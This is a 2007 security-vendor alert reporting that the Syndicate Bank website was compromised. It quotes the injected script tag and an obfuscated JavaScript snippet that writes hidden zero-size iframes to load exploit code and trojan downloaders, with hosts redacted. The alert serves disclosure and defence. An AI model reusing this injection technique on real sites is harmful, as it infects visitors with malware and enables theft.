Home / mailings WSLabs, Malicious Web site / Malicious Code: Syndicate Bank site compromised
Posted on 17 August 2007
Websense Security LabWebsense® Security LabsT has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in), was compromised with a malicious script that attempts to exploit multiple vulnerabilities. When customers visit the web site, a malicious JavaScript file (e.js) is executed and creates two additional iframes in the page.
<script src=http://< URL REMOVED >/e.js></script>
Snippet of js code:
document.writeln("//xxxx mca By Mr.0wen//");
document.writeln("document.write(unescape("%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D%220%22%20FraMebOrder %3D%220%22%3E%3C/IFraMe%3E"));");
document.writeln("//xxxx mca By Mr.0wen//");
The JavaScript from e.js (seen above) creates two new IFRAME elements within the page. One IFRAME attempts to load exploit code and the other creates several additional IFRAMEs that contain advertisement-related content. The exploit will try to load a Trojan Downloader (qq.exe) which will contact a remote server to download the following Trojan Downloader and Backdoor:
http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe
The site appears to have been cleaned a few hours ago.
For additional details and information on how to detect and prevent this type of attack:
http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=794